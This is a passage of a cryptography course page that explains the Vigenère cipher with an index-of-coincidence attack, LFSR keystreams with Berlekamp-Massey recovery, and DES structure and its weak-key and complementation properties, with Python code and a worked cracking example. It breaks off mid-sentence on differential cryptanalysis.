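title="Worked example: Vigenère in Python with the IoC attack"></a>Worked example: Vigenère in Python with the IoC attack</h4><p>The block below is an added example and not code from the original page. It is a Python version of the cipher with the conventions used above (case preserved, non-letters copied through without consuming a key letter) together with the two-step attack from "Attack methods": the average index of coincidence picks the key length, then a shifted-frequency score picks each key letter. The plaintext is the one recovered in the cracking run that follows; the key <code>SIGMA</code>, the bound <code>max_key_len=8</code> and the English frequency table are assumptions of this example. Unlike the C++ program, which takes the shift whose score is closest to 0.065, this version takes the shift with the largest score, which is the more common form of the test.</p>

```python
"""Vigenere cipher (letters keep their case, non-letters pass through and do not
consume a key letter) and the index-of-coincidence attack: average IC over candidate
periods for the key length, then the shifted frequency score M_g per column for each
key letter. Added example, not the page's code. The English frequency table is the
standard one; the key SIGMA and max_key_len=8 are assumptions of this demo."""
from collections import Counter

# Relative frequencies of A..Z in English text (standard table, sums to about 1).
ENGLISH_FREQ = [
    0.082, 0.015, 0.028, 0.043, 0.127, 0.022, 0.020, 0.061, 0.070, 0.002, 0.008, 0.040, 0.024,
    0.067, 0.075, 0.019, 0.001, 0.060, 0.063, 0.091, 0.028, 0.010, 0.023, 0.001, 0.020, 0.001,
]


def vigenere(text, key, decrypt=False):
    """Shift each letter by the next key letter (backwards when decrypting)."""
    shifts = [ord(k) - ord('a') for k in key.lower() if k.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, j = [], 0
    for ch in text:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            s = shifts[j % len(shifts)]
            out.append(chr((ord(ch) - base + (-s if decrypt else s)) % 26 + base))
            j += 1                      # only letters advance the key
        else:
            out.append(ch)              # spaces, digits, punctuation: unchanged
    return ''.join(out)


def index_of_coincidence(column):
    """IC = sum f_i (f_i - 1) / (N (N - 1)): about 0.065 for English, 1/26 for random letters."""
    n = len(column)
    if n < 2:
        return 0.0
    return sum(f * (f - 1) for f in Counter(column).values()) / (n * (n - 1))


def columns(letters, key_len):
    """Column i holds the letters enciphered with key letter i."""
    return [letters[i::key_len] for i in range(key_len)]


def guess_key_length(letters, max_key_len=8):
    """The period whose columns have the highest average IC. Multiples of the true
    period score just as well, so keep max_key_len below twice the expected key
    length (ties resolve to the smallest period)."""
    scores = {k: sum(index_of_coincidence(c) for c in columns(letters, k)) / k
              for k in range(1, max_key_len + 1)}
    return max(scores, key=scores.get)


def best_shift(column):
    """Key letter of one column: the shift g maximising M_g = sum_k p_k f_{k+g} / N,
    i.e. the shift under which the column looks most like English."""
    if not column:
        return 0
    counts = [0] * 26
    for ch in column:
        counts[ord(ch) - ord('A')] += 1
    n = len(column)
    scores = [sum(ENGLISH_FREQ[k] * counts[(k + g) % 26] for k in range(26)) / n
              for g in range(26)]
    return max(range(26), key=scores.__getitem__)


def crack(ciphertext, max_key_len=8):
    """Ciphertext-only attack: returns (key, plaintext)."""
    letters = ''.join(ch for ch in ciphertext.upper() if ch.isalpha())
    key_len = guess_key_length(letters, max_key_len)
    key = ''.join(chr(ord('A') + best_shift(c)) for c in columns(letters, key_len))
    return key, vigenere(ciphertext, key, decrypt=True)


# Plaintext copied from the cracking run on this page; the key is a constructed choice.
SAMPLE_PLAINTEXT = (
    "THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITY"
    "OFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEEN"
    "NINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATION"
    "ORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDAND"
    "FOURTHELABORATORYHASBEENRENAMEDASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHING"
    "TECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGY"
)
SAMPLE_KEY = "SIGMA"

if __name__ == "__main__":
    ct = vigenere(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    key, pt = crack(ct)
    print("recovered key:", key, "| plaintext recovered:", pt == SAMPLE_PLAINTEXT)
```

<p>With about 435 letters and a 5-letter key every column holds roughly 87 letters, which is comfortably enough for both statistics; with a few dozen letters per column the shift test starts to make mistakes, which is the "ciphertext must be long enough" condition stated in the security analysis.</p><h4 id="破解-run"><a href="#破解-run" class="headerlink" 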
title="Cracking"></a>Cracking</h4><blockquote><p>For example, breaking the ciphertext:</p><p><strong><em>BZGTNPMMCGZFPUWJCUIGRWXPFNLHZCKOAPGLKYJNRAQFIUYRAVGNPANUMDQOAHMWTGJDXGOMPJPTKAAVZIUIWKVTUCWBWNFWDFUMPJWPMQGPTNWXTSDPLPMWJAXUHHXWPFXXGVAPFNTXVFKOYIRBOQJHCBVWVFYCGQFGUSUBDWVIYATJGTBNDKGHCTMTWIUEFJITVUGJHHIMUVJICUWYQWYGGUWPUUCWIFGWUANILKPHDKOSPJTTWJQOJHXLBJAPZHVQWPDYPGLLGDBCHTGIZCCMEGVIIJLIFFBHSMEGUJHRXBOQUBDNASPEUCWNGWSNWXTSDPLPMWJAIUHUMWPSYCTUWFBMIAMKVBNTDMQNBVDKILQSSDYVWVXIGDQFIBHSLEAVDBXGOLGDBCHTGIZVNFQFKTNGRWXUDCTGKWCOXIXKZPPFDZG</em></strong></p><p>gives the plaintext:</p><p><strong><em>THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITYOFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEENNINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATIONORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDANDFOURTHELABORATORYHASBEENRENAMEDASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGY</em></strong></p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/EcsJzqWKLCfHoOR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-1"><a href="#安全性分析-1" class="headerlink" title="Security analysis"></a>Security analysis</h3><p>Polyalphabetic substitution destroys the single-letter frequency pattern of the language, so its analysis is considerably harder than for monoalphabetic substitution, and the gain in security over a monoalphabetic cipher is substantial. It can still be broken with statistical methods (see the attack methods above). Every attack on a polyalphabetic cipher ultimately rests on letter frequencies, and Vigenère is no exception; only a direct frequency count of the whole ciphertext no longer works. The Kasiski examination or the index of coincidence yields the key length; with the key length in hand the ciphertext decomposes into that many Caesar ciphers, each of which is broken separately, exactly as in the cracking run above. The precondition is enough ciphertext: the statistics need on the order of a few dozen letters per key position, so a ciphertext much shorter than that is practically unbreakable by this method, while a long one falls easily.</p><h2 id="序列密码-LFSR"><a href="#序列密码-LFSR" class="headerlink" title="Stream cipher: LFSR"></a>Stream cipher: LFSR</h2><h3 id="概述-2"><a href="#概述-2" class="headerlink" title="Overview"></a>Overview</h3><p>A feedback shift register consists of a shift register and a feedback function. The shift register is a sequence of bits; on every clock all bits move one position to the right, the rightmost bit leaves the register as output, and the new leftmost bit is computed by the feedback function from certain positions of the register. A linear feedback shift register (LFSR) is a feedback shift register whose feedback function is linear, that is, the XOR of a fixed set of register positions (the taps). If the tap positions correspond to a primitive polynomial of degree L, a nonzero initial state runs through all 2<sup>L</sup> − 1 nonzero states before repeating.</p><h3 id="算法实现-2"><a href="#算法实现-2" class="headerlink" 
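title="Worked example: LFSR keystream and its linear complexity"></a>Worked example: LFSR keystream and its linear complexity</h3><p>The block below is an added example, not code from the original page. It generates the keystream with the same tap convention as the implementation that follows (a list of exponents such as <code>[20, 3]</code> for x<sup>20</sup> + x<sup>3</sup> + 1, new bit entering on the left, output taken from the right), measures the period of small polynomials, and then shows why a bare LFSR is not a cipher: the Berlekamp-Massey algorithm recovers the feedback polynomial and the entire future keystream from 2L consecutive output bits, which an attacker gets from 2L bits of known plaintext. The seed value and the 40-bit known prefix are assumptions of the example; the degree-20 polynomial is the one named in the page's code comment.</p>

```python
"""LFSR with the tap convention of the program below (a list of exponents such as
[20, 3] for x^20 + x^3 + 1; the new bit enters on the left, the output leaves on the
right) and the Berlekamp-Massey algorithm, which recovers the feedback polynomial and
the rest of the keystream from 2L consecutive output bits. Added example, not the
page's code; the seed and the 40-bit known-keystream prefix are assumptions."""


def step(state, taps):
    """One clock: XOR the tapped bits (position t counted 1.. from the left) into a
    new leftmost bit, shift everything one place right, drop the old rightmost bit."""
    new_bit = 0
    for t in taps:
        new_bit ^= state[t - 1]
    return [new_bit] + state[:-1]


def lfsr_stream(taps, seed, nbits):
    """Return nbits output bits; the output is the rightmost bit before each shift."""
    state = list(seed)
    if len(state) != max(taps) or not any(state):
        raise ValueError("seed needs max(taps) bits and must not be all zero")
    out = []
    for _ in range(nbits):
        out.append(state[-1])
        state = step(state, taps)
    return out


def period(taps):
    """Clocks until the register returns to the start state 0...01: 2^L - 1 for a
    primitive polynomial of degree L, shorter for a non-primitive one."""
    seed = [0] * (max(taps) - 1) + [1]
    state, clocks = step(seed, taps), 1
    while state != seed:
        state, clocks = step(state, taps), clocks + 1
    return clocks


def berlekamp_massey(bits):
    """Shortest LFSR generating bits: returns (L, taps) with s_i = XOR_{t in taps} s_{i-t}."""
    n = len(bits)
    c, b = [1] + [0] * n, [1] + [0] * n   # current and previous connection polynomials
    L, m = 0, -1
    for i in range(n):
        d = bits[i]                        # discrepancy between prediction and bit i
        for j in range(1, L + 1):
            d ^= c[j] & bits[i - j]
        if d == 0:
            continue
        t, shift = c[:], i - m
        for j in range(n + 1 - shift):     # c(x) += x^shift * b(x)
            c[j + shift] ^= b[j]
        if 2 * L <= i:
            L, m, b = i + 1 - L, i, t
    return L, [j for j in range(L, 0, -1) if c[j]]


def predict(known_bits, nmore):
    """Known-plaintext attack: ciphertext XOR plaintext gives known_bits; from them
    recover the generator and produce the next nmore keystream bits."""
    L, taps = berlekamp_massey(list(known_bits))
    seq = list(known_bits)
    for _ in range(nmore):
        seq.append(sum(seq[-t] for t in taps) % 2)
    return L, taps, seq[len(known_bits):]


TAPS = [20, 3]                                                        # x^20 + x^3 + 1
SEED = [1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1]   # constructed 20-bit seed

if __name__ == "__main__":
    keystream = lfsr_stream(TAPS, SEED, 100)
    L, taps, rest = predict(keystream[:40], 60)                       # 2L = 40 known bits
    print("x^5+x^2+1 period:", period([5, 2]), "| x^4+x^2+1 period:", period([4, 2]))
    print("recovered L =", L, "taps =", taps, "| next 60 bits correct:", rest == keystream[40:])
```

<p>The recovered tap list is exactly the one the generator was built from, so the 2<sup>20</sup> possible seeds never have to be searched; this is why real stream ciphers combine several LFSRs through a nonlinear function (or use a different design altogether) rather than output an LFSR directly. The period check also shows the difference between a primitive polynomial (x<sup>5</sup> + x<sup>2</sup> + 1 gives 31) and a non-primitive one (x<sup>4</sup> + x<sup>2</sup> + 1 gives 6 instead of 15).</p><h3 id="算法实现-2-impl"><a href="#算法实现-2-impl" class="headerlink" 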
title="Implementation"></a>Implementation</h3><p>The register is initialised to all zeros with a single 1 in the rightmost position, the tap list is taken from the exponents of the primitive polynomial, and a list records each state the register passes through.</p><p><code>zfill</code> builds the initial register state, <code>output_ = []</code> collects the output sequence, <code>feedback</code> computes the XOR of the tapped bits, and regs.txt records the register states within one period.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># degree-20 primitive polynomial x^20 + x^3 + 1, entered as the tap list [20, 3]</span><br><span class="line">def feedback(reg, fb):</span><br><span class="line">    """</span><br><span class="line">    Feedback function</span><br><span class="line">    :param reg: current contents of the shift register (a string of '0'/'1')</span><br><span class="line">    :param fb: list of tap positions (the exponents of the primitive polynomial)</span><br><span class="line">    :return: the new leftmost bit, the XOR of the tapped bits</span><br><span class="line">    """</span><br><span class="line">    res = int(reg[fb[0] - 1])</span><br><span class="line">    for i in range(1, len(fb)):</span><br><span class="line">        res ^= int(reg[fb[i] - 1])</span><br><span class="line">    return res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def lfsr(p):</span><br><span class="line">    """</span><br><span class="line">    Linear feedback shift register</span><br><span class="line">    :param p: list of exponents of the primitive polynomial, e.g. [20, 3]</span><br><span class="line">    :return: (output sequence, list of register states in one period)</span><br><span class="line">    """</span><br><span class="line">    reg_len = max(p)</span><br><span class="line">    # initial register state: 00000....001</span><br><span class="line">    shift_reg = '1'.zfill(reg_len)  # left-pad the 1 with zeros</span><br><span class="line">    regs = [shift_reg]              # register states in order of appearance</span><br><span class="line">    seen = {shift_reg}              # the same states as a set, for O(1) membership tests</span><br><span class="line">    output_ = []                    # output sequence</span><br><span class="line">    for i in range(pow(2, reg_len) - 1):</span><br><span class="line">        # output the rightmost bit of the register</span><br><span class="line">        output_.append(shift_reg[-1])</span><br><span class="line">        # XOR of the tapped bits becomes the new leftmost bit</span><br><span class="line">        input_ = str(feedback(shift_reg, p))</span><br><span class="line">        shift_reg = input_ + shift_reg[:-1]</span><br><span class="line">        # a state that has already occurred marks the end of one period</span><br><span class="line">        if shift_reg in seen:</span><br><span class="line">            break</span><br><span class="line">        regs.append(shift_reg)</span><br><span class="line">        seen.add(shift_reg)</span><br><span class="line">    return output_, regs</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    while True:</span><br><span class="line">        try:</span><br><span class="line">            ct = input("\nEnter the exponents of the primitive polynomial (space separated, q to quit):\n").split(" ")</span><br><span class="line">            if ('q' in ct) or ('Q' in ct):</span><br><span class="line">                break</span><br><span class="line">            ct = [int(ct[i]) for i in range(len(ct))]</span><br><span class="line">            print("The polynomial you entered is:")</span><br><span class="line">            for i in range(len(ct)):</span><br><span class="line">                print("x^" + str(ct[i]) + " + ", end="")</span><br><span class="line">            print("1")</span><br><span class="line">            print("Theoretical maximum period: " + str(pow(2, max(ct)) - 1))</span><br><span class="line">            mode = input("Confirm:\n[Y] yes\t[N] re-enter\t[Q] quit\n")</span><br><span class="line">            if mode == 'Y' or mode == 'y':</span><br><span class="line">                outputs, regs = lfsr(ct)</span><br><span class="line">                print("\nPeriod: " + str(len(outputs)))</span><br><span class="line">                choice1 = input("Show the output sequence?\n[Y] yes\t[N] no\n")</span><br><span class="line">                if choice1 == 'Y' or choice1 == 'y':</span><br><span class="line">                    for i in outputs:</span><br><span class="line">                        print(i, end="")</span><br><span class="line">                choice2 = input("\nSave the register states of one period?\n[Y] yes\t[N] no\n")</span><br><span class="line">                if choice2 == 'Y' or choice2 == 'y':</span><br><span class="line">                    with open('regs.txt', 'w') as f:</span><br><span class="line">                        for i in regs:</span><br><span class="line">                            f.write(i + "\n")</span><br><span class="line">                    print("Done: the register states of one period are saved in regs.txt")</span><br><span class="line">            elif mode == 'N' or mode == 'n':</span><br><span class="line">                continue</span><br><span class="line">            else:</span><br><span class="line">                if mode == 'Q' or mode == 'q':</span><br><span class="line">                    break</span><br><span class="line">                else:</span><br><span class="line">                    continue</span><br><span class="line">        except ValueError:</span><br><span class="line">            print("Invalid input!")</span><br><span class="line">            continue</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == '__main__':</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-2"><a href="#运行结果-2" class="headerlink" title="Results"></a>Results</h3><p>Polynomial of degree 18 used in the run: x^18 + x^3 + 1</p><p>Initial register value: [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1]</p><p>Polynomial coefficient vector: [1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0]</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/OaJ71VAvEzou3NU.png" alt="" title=""> </div> <div 
class="image-caption"></div> </figure><h3 id="安全性分析-2"><a href="#安全性分析-2" class="headerlink" title="Security analysis"></a>Security analysis</h3><p>The implementation shows that encryption and decryption with a stream cipher depend entirely on the seed key, so the seed key must be kept secret; the attacks target it. Exhaustive search over the seed is always possible, so the key must be long enough. Weak keys produce a keystream that repeats early, and once the keystream repeats, the ciphertext may be broken. A plain LFSR has a further problem that no key length fixes: its output is linear, so the Berlekamp-Massey algorithm recovers the taps and the full state from 2L consecutive keystream bits (obtained from 2L bits of known plaintext), after which the rest of the keystream can be computed. Practical designs therefore feed several LFSRs through a nonlinear combining function or use a different keystream generator. Stream ciphers are simple to implement, well suited to hardware, fast, and have no or only limited error propagation, which keeps them attractive in practice, particularly in dedicated or classified equipment. A stream cipher is a time-varying encryption transform; its advantages are high throughput, low error propagation and a simple hardware circuit.</p><h2 id="分组密码"><a href="#分组密码" class="headerlink" title="Block ciphers"></a>Block ciphers</h2><h3 id="概述-3"><a href="#概述-3" class="headerlink" title="Overview"></a>Overview</h3><p>DES is a block cipher: the plaintext is processed in 64-bit blocks with a 64-bit key, of which 56 bits are effective; every eighth bit is an odd-parity bit (each byte of the key has an odd number of 1s). As the figure shows, the 64-bit key passes through permuted choices and circular shifts to produce sixteen 48-bit subkeys. The plaintext m goes through the initial permutation IP, is split into a left and a right half of 32 bits each, runs through 16 Feistel rounds (the last one without the left/right swap) and finally through the inverse permutation IP<sup>-1</sup> to give the ciphertext c.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/RwXo4zZ3BbAuvgd.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Encryption equations:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/kLUrC6HYhunBxSf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Decryption equations:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/Z7IKfMSBF4RVUkH.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Comparing the two shows that the Feistel round is an involution: decryption is the same algorithm as encryption with the subkeys applied in reverse order, K16 first and K1 last.</p><h3 id="密钥扩展"><a href="#密钥扩展" class="headerlink" title="Key expansion"></a>Key expansion</h3><p>The key schedule generates the round subkeys. The 64-bit initial key passes through permuted choice 1 (PC-1) and becomes 56 bits; sixteen rounds of circular left shifts followed by permuted choice 2 (PC-2) then yield the sixteen 48-bit subkeys K<sub>i</sub> used in the round function.</p><p>PC-1 drops the parity bits; PC-2 drops bits 9, 18, 22, 25, 35, 38, 43 and 54 of the 56-bit value.</p><h4 id="置换选择"><a href="#置换选择" class="headerlink" title="Permuted choice"></a>Permuted choice</h4><p>Permuted choice 1 (PC-1) and permuted choice 2 (PC-2); the tables <code>PC_1</code> and <code>PC_2</code> hold 1-based bit positions, so <code>i-1</code> indexes the string:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># PC-1 permutation of the key: 64 bits in, 56 bits out</span><br><span class="line">def change_key1(my_key):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in PC_1:</span><br><span class="line">        res += my_key[i-1]</span><br><span class="line">    return res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># PC-2 permutation of the key: 56 bits in, 48 bits out</span><br><span class="line">def change_key2(my_key):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in PC_2:</span><br><span class="line">        res += my_key[i-1]</span><br><span class="line">    return res</span><br></pre></td></tr></table></figure></div><h4 id="循环左移"><a href="#循环左移" class="headerlink" title="Circular left shift"></a>Circular left shift</h4><p>The input string is rotated left by the given number of positions; slicing does the work (the bits that fall off the left end are appended on the right):</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># circular left shift of a bit string by num positions</span><br><span class="line">def left_turn(my_str, num):</span><br><span class="line">    num %= len(my_str)   # a negative num becomes the equivalent left rotation</span><br><span class="line">    return my_str[num:] + my_str[:num]</span><br></pre></td></tr></table></figure></div><p>The benefit of the modulo: a negative <code>num</code> is handled as well and acts as a circular right shift, which is convenient when the key schedule is run backwards for decryption.</p><h3 id="初始置换-IP-和它的逆置换-IP-1"><a href="#初始置换-IP-和它的逆置换-IP-1" class="headerlink" title="Initial permutation IP and its inverse IP-1"></a>Initial permutation IP and its inverse IP<sup>-1</sup></h3><p>IP is applied before the first round. It transposes the bits of the plaintext block (a table lookup) and has no cryptographic significance, which is why software implementations often omit it.</p><p>IP<sup>-1</sup> is applied after the last round; in encryption its output is the ciphertext, in decryption the plaintext. If IP is dropped, IP<sup>-1</sup> is dropped with it.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/FwSLDfHza7yYRsu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line"># IP permutation</span><br><span class="line">def ip_change(bin_str):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in IP_table:</span><br><span class="line">        res += bin_str[i-1]   # the table is 1-based, the string 0-based</span><br><span class="line">    return res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># inverse IP permutation</span><br><span class="line">def ip_re_change(bin_str):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in IP_re_table:</span><br><span class="line">        res += bin_str[i-1]</span><br><span class="line">    return res</span><br></pre></td></tr></table></figure></div><h3 id="F-函数"><a href="#F-函数" class="headerlink" title="The F function"></a>The F function</h3><p>Also called the round function, it consists of four steps:</p><ol><li>expansion permutation (E box)</li><li>key mixing</li><li>S boxes</li><li>P box</li></ol><p>Each step is explained below.</p><h4 id="1-扩展置换"><a href="#1-扩展置换" class="headerlink" title="1. Expansion permutation"></a>1. Expansion permutation</h4><p><strong><em>32 bit → 48 bit</em></strong></p><p>The expansion permutation widens the right half of the data from 32 to 48 bits. It changes the order of the bits and repeats some of them.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/6KLNZ7pdGP9vblH.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Purpose: a single data bit enters two S boxes, so one plaintext bit can influence two S-box outputs, and together with the S boxes this produces the avalanche effect quickly.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># E-box expansion: 32 bits in, 48 bits out</span><br><span class="line">def e_key(bin_str):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in E:</span><br><span class="line">        res += bin_str[i-1]</span><br><span class="line">    return res</span><br></pre></td></tr></table></figure></div><h4 id="2-密钥加"><a href="#2-密钥加" class="headerlink" title="2. Key mixing"></a>2. Key mixing</h4><p><strong><em>48 bit ⊕ 48 bit → 48 bit</em></strong></p><p>The E-box output is XORed bit by bit with the round subkey.</p><p>In Python, XOR is the <code>^</code> operator. Because this implementation keeps all data as strings of <code>'0'</code>/<code>'1'</code> characters (simple, if not fast), a small helper XORs two such strings:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># XOR of two equal-length bit strings</span><br><span class="line">def str_xor(my_str1, my_str2):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in range(0, len(my_str1)):</span><br><span class="line">        xor_res = int(my_str1[i]) ^ int(my_str2[i])   # the characters '0'/'1' become the integers 0/1</span><br><span class="line">        res += str(xor_res)</span><br><span class="line">    return res</span><br></pre></td></tr></table></figure></div><h4 id="3-代换盒(S-盒)"><a href="#3-代换盒(S-盒)" class="headerlink" title="3. Substitution boxes (S boxes)"></a>3. Substitution boxes (S boxes)</h4><p><strong><em>48 bit → 32 bit</em></strong></p><p>The S boxes provide the nonlinear substitution; they are <strong>the only nonlinear component of DES</strong>.</p><p>In practice they are table lookups: the 48 bits are split into eight groups of 6 bits, one group per S box.</p><p>Each S box takes 6 bits and outputs 4. The outer two bits (first and sixth) select the row, the middle four bits select the column.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/43JPsw2OmtHheCW.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><code>bin()</code> does not zero-pad its result to four digits, hence the loop in the code below that prepends <code>'0'</code> characters until the output is 4 bits wide. Each <code>S[c]</code> is a flat list of 64 entries, indexed by <code>row*16 + col</code>.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># S-box substitution: 48 bits in, 32 bits out</span><br><span class="line">def s_box(my_str):</span><br><span class="line">    res = ""</span><br><span class="line">    c = 0                                  # index of the current S box</span><br><span class="line">    for i in range(0, len(my_str), 6):</span><br><span class="line">        now_str = my_str[i:i+6]</span><br><span class="line">        row = int(now_str[0] + now_str[5], 2)   # outer bits select the row</span><br><span class="line">        col = int(now_str[1:5], 2)              # middle bits select the column</span><br><span class="line">        num = bin(S[c][row*16 + col])[2:]       # bin() may return fewer than 4 digits</span><br><span class="line">        for gz in range(0, 4-len(num)):</span><br><span class="line">            num = '0' + num</span><br><span class="line">        res += num</span><br><span class="line">        c += 1</span><br><span class="line">    return res</span><br></pre></td></tr></table></figure></div><h4 id="4-置换盒(P-盒)"><a href="#4-置换盒(P-盒)" class="headerlink" title="4. Permutation box (P box)"></a>4. Permutation box (P box)</h4><p><strong><em>32 bit → 32 bit</em></strong></p><p>A straight permutation of the 32 S-box output bits, which spreads each S box's output over different S boxes in the next round.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"># P-box permutation: 32 bits in, 32 bits out</span><br><span class="line">def p_box(bin_str):</span><br><span class="line">    res = ""</span><br><span class="line">    for i in P:</span><br><span class="line">        res += bin_str[i-1]</span><br><span class="line">    return res</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-3"><a href="#运行结果-3" class="headerlink" title="Results"></a>Results</h3><h4 id="加密-2"><a href="#加密-2" class="headerlink" title="Encryption"></a>Encryption</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/nbDWETfgRQNtH1w.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="解密-1"><a href="#解密-1" class="headerlink" title="Decryption"></a>Decryption</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/3GUOFL1Smy7a8Qe.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-3"><a href="#安全性分析-3" class="headerlink" 
title="Security analysis"></a>Security analysis</h3><p>Points of debate about the security of DES:</p><ul><li>The S-box design criteria were never fully published, so it is not known whether further criteria went into their construction</li><li>DES has weak keys and semi-weak keys</li><li>The 56-bit key cannot withstand exhaustive search</li><li>The algebraic structure has the complementation property</li></ul><p>Weak keys:</p><p>When the subkeys are derived from an initial key K, the 56-bit key is split into two halves. If K makes every bit of each half all 0 or all 1, the key schedule produces sixteen identical subkeys, K<sub>1</sub> = K<sub>2</sub> = … = K<sub>16</sub>, and K is called a weak key (there are four of them).</p><p>If K is a weak key, then for every 64-bit message m:</p><p>E<sub>K</sub>(E<sub>K</sub>(m)) = m and D<sub>K</sub>(D<sub>K</sub>(m)) = m</p><p>Semi-weak keys:</p><p>A semi-weak key pair consists of two different keys k and k′ whose subkey sequences are the reverse of each other, so that encrypting under k′ undoes encrypting under k (there are six such pairs). For a plaintext block m:</p><p>E<sub>k′</sub>(E<sub>k</sub>(m)) = E<sub>k</sub>(E<sub>k′</sub>(m)) = m</p><p>Complementation property:</p><p>Write m̄ for the bitwise complement of the plaintext m and K̄ for the bitwise complement of the key K. If c = E<sub>K</sub>(m), then c̄ = E<sub>K̄</sub>(m̄); this is the complementation property of the algorithm.</p><p>It follows from where the two XORs sit in a round: one before the S boxes, one after the P box.</p><p>If plaintext and key are complemented together, the output of the expansion E and the output of the key schedule are both complemented, so their XOR is the same as without complementing: the S-box input is unchanged and therefore so is its output. At the second XOR the left half has been complemented, so the round output is complemented.</p><p>The complementation property halves the work of a chosen-plaintext exhaustive search, to 2<sup>55</sup>:</p><p>For the chosen plaintexts m and m̄ obtain the ciphertexts</p><p>c<sub>1</sub> = E<sub>K</sub>(m), c<sub>2</sub> = E<sub>K</sub>(m̄)</p><p>By the complementation property</p><p>c̄<sub>2</sub> = E<sub>K̄</sub>(m)</p><p>So when a candidate key k is tried on m: if the result is c<sub>1</sub>, the key is k; if the result is c̄<sub>2</sub>, the key is k̄. Each trial encryption tests two keys.</p><p>Differential cryptanalysis:</p><p>Analyses how particular plaintext differences propagate to ciphertext differences in order to find the most likely key. It applies mainly to iterated block ciphers and was first proposed against DES. It does not give a practical attack on the full 16-round DES, but it is very successful against reduced-round 